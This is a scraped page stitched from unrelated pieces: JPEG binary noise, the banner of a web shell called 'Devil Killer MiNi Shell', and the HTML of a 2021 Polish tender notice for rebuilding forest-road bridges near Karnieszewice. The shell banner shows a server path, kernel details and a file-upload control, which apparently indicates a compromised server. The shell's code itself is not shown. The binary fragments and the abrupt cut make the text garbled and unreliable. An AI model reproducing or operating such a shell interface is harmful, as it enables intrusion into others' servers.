JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210930/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210930/0019850601-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa mostów umiejscowionych na drogach leśnych będących w zarządzie Nadleśnictwa Karnieszewice w 2021 roku – II postępowanie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">PAŃSTWOWE GOSPODARSTWO LEŚNE LASY PAŃSTWOWE NADLEŚNICTWO KARNIESZEWICE</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 330044097</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">8a</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Trawica</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">76-004</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL426 - Koszaliński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">(94) 3185227</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">(94) 3168481</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">karnieszewice@szczecinek.lasy.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.karnieszewice.szczecinek.lasy.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Gospodarka Leśna </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa mostów umiejscowionych na drogach leśnych będących w zarządzie Nadleśnictwa Karnieszewice w 2021 roku – II postępowanie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-b4714984-2131-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00198506</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-09-30</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://portal.smartpzp.pl/nadlesnictwo_karnieszewice <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Portal e-Usług SMARTPZP<br/>https://portal.smartpzp.pl/nadlesnictwo_karnieszewice</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne dotyczące korzystania z Platformy:<br/>a) przesyłane dokumenty powinny być załączone w formie plików w formacie odpowiednio . png, .jpg,<br/>.jpeg, .gif, .doc, .docx, .xls, .xlsx, .ppt, .pptx, .odt, .ods, .odp, .odf, .pdf, .zip, .rar, .7zip, .txt, .ath, .xml,<br/>.dwg, .xades, .tar, .7z, .eml, .msg,<br/>b) wymagania sprzętowe dla Wykonawcy:<br/>- przeglądarka internetowa Mozzilla Firefox ver. 65 i późniejsze, Google Chrome ver. 66 i późniejsze<br/>lub Opera ver. 58 i późniejsze, Microsoft Edge ver 18 i późniejsze, Internet Explorer 11<br/>- lista zalecanych przeglądarek internetowych: Google Chrome, Mozilla Firefox, Opera. Zalecane jest<br/>używanie najnowszych wersji przeglądarek,<br/>- system operacyjny Windows 7 i późniejsze,<br/>- zainstalowane środowisko Java w wersji min. 1.8 (jre),<br/>- w przypadku przeglądarek Opera, Chrome i Firefox należy doinstalować dodatek do przeglądarki<br/>Szafir SDK Web,<br/>- oprogramowanie SzafirHost w systemie operacyjnym,<br/>- stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 1 Mb/s,<br/>- komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min. 3 GB RAM, procesor 1500 MHz<br/>lub lepszy, jeden z systemów operacyjnych Linux Kernel 4.0, Windows 7 i MacOS 10.12 - lub ich<br/>nowsze wersje,<br/>- zainstalowany program Acrobat Reader lub inny umożliwiający obsługę formatów .pdf.<br/>Dokumentację przekazuje się w postaci elektronicznej i opatruje się kwalifikowanym podpisem<br/>elektronicznym, podpisem zaufanym lub podpisem osobistym.<br/>Pozostałe wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych,<br/>elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu<br/>opisane zostały w Regulaminie korzystania z Platformy.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Zamawiający dopuszcza złożenie oferty w postaci katalogu</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Stosownie do art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych osobowych)(Dz. Urz. UE L<br/>119 z 04 maja 2016 r., str. 1 – „RODO”) Zamawiający informuje, iż administratorem danych osobowych<br/>jest Nadleśnictwo Karnieszewice. Administrator wyznaczył Inspektora Ochrony Danych Osobowych p.<br/>Andrzeja Świerczek z którym w sprawach dotyczących przetwarzania danych osobowych można<br/>skontaktować się za pośrednictwem poczty elektronicznej pod adresem<br/>iod.karnieszewice@szczecinek.lasy.gov.pl lub telefonicznie pod numerem (94)3185227 Szczegółowy<br/>zakres obowiązku informacyjnego RODO został opisany w pkt 21 SWZ.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Prawo do żądania od Zamawiającego – jako<br/>administratora, ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których<br/>mowa w art. 18 ust. 2 RODO, przy czym prawo do ograniczenia przetwarzania nie ma zastosowania w<br/>odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w<br/>celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu<br/>publicznego Unii Europejskiej lub państwa członkowskiego; prawo to nie ogranicza przetwarzania<br/>danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia publicznego;</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SA.270.3.7.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie 1 – przebudowa mostu drogowego usytuowanego w ciągu drogi leśnej nr 40 nad rzeką Bielawa (działka 410/1, 423/1, 344 obręb ewidencyjny Sierakowo – gm. Sianów, działka 411 obręb ewidencyjny Kusice – gm. Malechowo)<br/>W ramach przebudowy obiektu zakłada się wykonanie następujących prac:<br/>I. Wykonanie nowego posadowienia i podpór obiektu;<br/>II. Odnowienie antykorozyjnych powłok malarskich istniejącego przęsła stalowego (dźwigar SMT-1) oraz stalowych poręczy;<br/>III. Uzupełnienie ewentualnych ubytków przęsła, w tym elementów konstrukcji stalowej oraz drewnianego wypełniania pomostu;<br/>IV. Wykonanie strefy przejściowej na dojazdach do obiektu;<br/>V. Umocnienie faszynowe (lub gabionowe) w obrębie brzegów;<br/>Podczas przewidywanych prac występować będzie etap rozbiórki wybranych elementów konstrukcji pomostu i podpór oraz elementów wyposażenia obejmujący:<br/>- usunięcie podpór konstrukcji wraz z pracami porządkowymi po częściowej rozbiórce konstrukcji.<br/>W ramach prowadzonych prac nie przewiduje się przebudowy przęsła stalowego – dźwigar SMT-1 Nie zakłada się podwyższenia nośności istniejącego przęsła stalowego. Zakłada się, że nośność nowego posadowienia i podpór powinna być nie mniejsza niż: jak dla klasy obciążenia C wg PN-85-S-10030 lub równoważne – „Obiekty mostowe – obciążenia”.<br/>Zdemontowane przęsło jest złożone na legarach na terenie placu budowy - w odległości nie większej niż 50 m od koryta rzeki. Podpory drewniane zostały rozebrane w części. Teren wymaga uporządkowania (m. in. prace ziemne, utylizacja materiału) po częściowej rozbiórce obiektu. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45220000-5 - Roboty inżynieryjne i budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45231000-5 - Roboty budowlane w zakresie budowy rurociągów, ciągów komunikacyjnych i linii energetycznych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">56 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze ofert w każdym Zadaniu Zamawiający będzie się kierował następującymi kryteriami oceny ofert, którym przypisano wagę jak poniżej:<br/>1) Cena – 60 %,<br/>2) Okres gwarancji: - 40 %<br/>Za najkorzystniejszą ofertę w danym Pakiecie uznana zostanie Oferta wykonawcy, która uzyska największą liczbę punktów.<br/>P = C + G gdzie:<br/>P - łączna liczba punktów, jaką uzyskała oceniana oferta<br/>C - liczba punktów przyznanych ocenianej ofercie w ramach kryterium Cena<br/>G - liczba punktów przyznanych ocenianej ofercie w kryterium Okres gwarancji.<br/>Zamawiający obliczy punkty, z dokładnością do dwóch miejsc po przecinku, zaokrąglając zgodnie z zasadami matematycznymi. Oferta może uzyskać maksymalnie 100 pkt.<br/>Jeżeli nie można dokonać wyboru najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający wybiera spośród tych ofert ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej wadze.<br/>Ocena ofert zostanie dokonana oddzielnie dla każdego Zadania.<br/>Ocenie w ramach kryterium „Cena” podlegać będzie cena łączna brutto podana w formularzu ofertowym dla danego Zadania (załącznik nr 1 do SWZ).<br/>Z uwagi na postanowienia art. 225 ust. 1 PZP, jeżeli złożono ofertę, której wybór prowadziłby do powstania u Zamawiającego obowiązku podatkowego zgodnie z przepisami o podatku od towarów i usług, Zamawiający w celu oceny takiej oferty dolicza do przedstawionej w niej ceny podatek od towarów i usług, który miałby obowiązek rozliczyć zgodnie z tymi przepisami.<br/>W ramach kryterium „Okres gwarancji" będzie rozpatrywane na podstawie zobowiązania zawartego w pkt 2 formularza ofertowego (Załącznik nr 1 do SWZ):<br/>a) za przyjęcie na siebie zobowiązania udzielenia gwarancji na okres 24 miesięcy wykonawca otrzyma 20 pkt,<br/>b) za przyjęcie na siebie zobowiązania udzielenia gwarancji na okres 36 miesięcy wykonawca otrzyma 30 pkt,<br/>c) za przyjęcie na siebie zobowiązania udzielenia gwarancji na okres 48 miesięcy wykonawca otrzyma 40 pkt,<br/>W przypadku nie zaznaczenia w formularzu ofertowym w pkt. 2 stosownej rubryki, tj. żadnej z opcji wyboru wykonawca otrzyma 20 pkt, a Zamawiający przyjmie, że wykonawca oferuje minimalny okres gwarancji tj. 24 miesiące.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji (24 mies. - 20 pkt, 36 mies. - 30 pkt, 48 mies. - 40 pkt)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie 2 - przebudowa mostu drogowego usytuowanego w ciągu drogi leśnej nr 51 nad rzeką Bielawa (działka 344, 460/1 – obręb Sierakowo – gmina Sianów, działka 203, 424 – obręb Kusice – gmina Malechowo)<br/>W ramach przebudowy obiektu zakłada się wykonanie następujących prac:<br/>I. Wykonanie nowego posadowienia i podpór obiektu;<br/>II. Odnowienie antykorozyjnych powłok malarskich istniejącego przęsła stalowego (dźwigar SMT-1) oraz stalowych poręczy;<br/>III. Uzupełnienie ewentualnych ubytków przęsła, w tym elementów konstrukcji stalowej oraz drewnianego wypełniania pomostu;<br/>IV. Wykonanie strefy przejściowej na dojazdach do obiektu;<br/>V. Umocnienie faszynowe (lub gabionowe) w obrębie brzegów;<br/>Podczas przewidywanych prac występować będzie etap rozbiórki wybranych elementów konstrukcji pomostu i podpór oraz elementów wyposażenia obejmujący:<br/>- usunięcie podpór konstrukcji wraz z pracami porządkowymi po częściowej rozbiórce konstrukcji.<br/>W ramach prowadzonych prac nie przewiduje się przebudowy przęsła stalowego – dźwigar SMT-1 Nie zakłada się podwyższenia nośności istniejącego przęsła stalowego. Zakłada się, że nośność nowego posadowienia i podpór powinna być nie mniejsza niż: jak dla klasy obciążenia C wg PN-85-S-10030 lub równoważne – „Obiekty mostowe – obciążenia”.<br/>Zdemontowane przęsło jest złożone na legarach na terenie placu budowy - w odległości nie większej niż 50 m od koryta rzeki. Podpory drewniane zostały rozebrane w części. Teren wymaga uporządkowania (m. in. prace ziemne, utylizacja materiału) po częściowej rozbiórce obiektu. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45220000-5 - Roboty inżynieryjne i budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45231000-5 - Roboty budowlane w zakresie budowy rurociągów, ciągów komunikacyjnych i linii energetycznych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">56 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze ofert w każdym Zadaniu Zamawiający będzie się kierował następującymi kryteriami oceny ofert, którym przypisano wagę jak poniżej:<br/>1) Cena – 60 %,<br/>2) Okres gwarancji: - 40 %<br/>Za najkorzystniejszą ofertę w danym Pakiecie uznana zostanie Oferta wykonawcy, która uzyska największą liczbę punktów.<br/>P = C + G gdzie:<br/>P - łączna liczba punktów, jaką uzyskała oceniana oferta<br/>C - liczba punktów przyznanych ocenianej ofercie w ramach kryterium Cena<br/>G - liczba punktów przyznanych ocenianej ofercie w kryterium Okres gwarancji.<br/>Zamawiający obliczy punkty, z dokładnością do dwóch miejsc po przecinku, zaokrąglając zgodnie z zasadami matematycznymi. Oferta może uzyskać maksymalnie 100 pkt.<br/>Jeżeli nie można dokonać wyboru najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający wybiera spośród tych ofert ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej wadze.<br/>Ocena ofert zostanie dokonana oddzielnie dla każdego Zadania.<br/>Ocenie w ramach kryterium „Cena” podlegać będzie cena łączna brutto podana w formularzu ofertowym dla danego Zadania (załącznik nr 1 do SWZ).<br/>Z uwagi na postanowienia art. 225 ust. 1 PZP, jeżeli złożono ofertę, której wybór prowadziłby do powstania u Zamawiającego obowiązku podatkowego zgodnie z przepisami o podatku od towarów i usług, Zamawiający w celu oceny takiej oferty dolicza do przedstawionej w niej ceny podatek od towarów i usług, który miałby obowiązek rozliczyć zgodnie z tymi przepisami.<br/>W ramach kryterium „Okres gwarancji" będzie rozpatrywane na podstawie zobowiązania zawartego w pkt 2 formularza ofertowego (Załącznik nr 1 do SWZ):<br/>a) za przyjęcie na siebie zobowiązania udzielenia gwarancji na okres 24 miesięcy wykonawca otrzyma 20 pkt,<br/>b) za przyjęcie na siebie zobowiązania udzielenia gwarancji na okres 36 miesięcy wykonawca otrzyma 30 pkt,<br/>c) za przyjęcie na siebie zobowiązania udzielenia gwarancji na okres 48 miesięcy wykonawca otrzyma 40 pkt,<br/>W przypadku nie zaznaczenia w formularzu ofertowym w pkt. 2 stosownej rubryki, tj. żadnej z opcji wyboru wykonawca otrzyma 20 pkt, a Zamawiający przyjmie, że wykonawca oferuje minimalny okres gwarancji tj. 24 miesiące.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji (24 mies. - 20 pkt, 36 mies. - 30 pkt, 48 mies. - 40 pkt)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie 3 - przebudowa mostu usytuowanego w ciągu drogi leśnej nr 62 nad rzeką Polnicą (działka 489/1 – obręb Ratajki, działka 290, 490 – obręb Sieciemin; gmina Sianów)<br/>W ramach przebudowy obiektu zakłada się wykonanie następujących prac:<br/>I. Wykonanie nowego posadowienia i podpór obiektu;<br/>II. Odnowienie antykorozyjnych powłok malarskich istniejącego przęsła stalowego (dźwigar SMT-1) oraz stalowych poręczy;<br/>III. Uzupełnienie ewentualnych ubytków przęsła, w tym elementów konstrukcji stalowej oraz drewnianego wypełniania pomostu;<br/>IV. Wykonanie strefy przejściowej na dojazdach do obiektu;<br/>V. Umocnienie faszynowe (lub gabionowe) w obrębie brzegów;<br/>Podczas przewidywanych prac występować będzie etap rozbiórki wybranych elementów konstrukcji pomostu i podpór oraz elementów wyposażenia obejmujący:<br/>- usunięcie podpór konstrukcji wraz z pracami porządkowymi po częściowej rozbiórce konstrukcji.<br/>W ramach prowadzonych prac nie przewiduje się przebudowy przęsła stalowego – dźwigar SMT-1 Nie zakłada się podwyższenia nośności istniejącego przęsła stalowego. Zakłada się, że nośność nowego posadowienia i podpór powinna być nie mniejsza niż: jak dla klasy obciążenia C wg PN-85-S-10030 lub równoważne – „Obiekty mostowe – obciążenia”.<br/>Zdemontowane przęsło jest złożone na legarach na terenie placu budowy - w odległości nie większej niż 50 m od koryta rzeki. Podpory drewniane zostały rozebrane w części. Teren wymaga 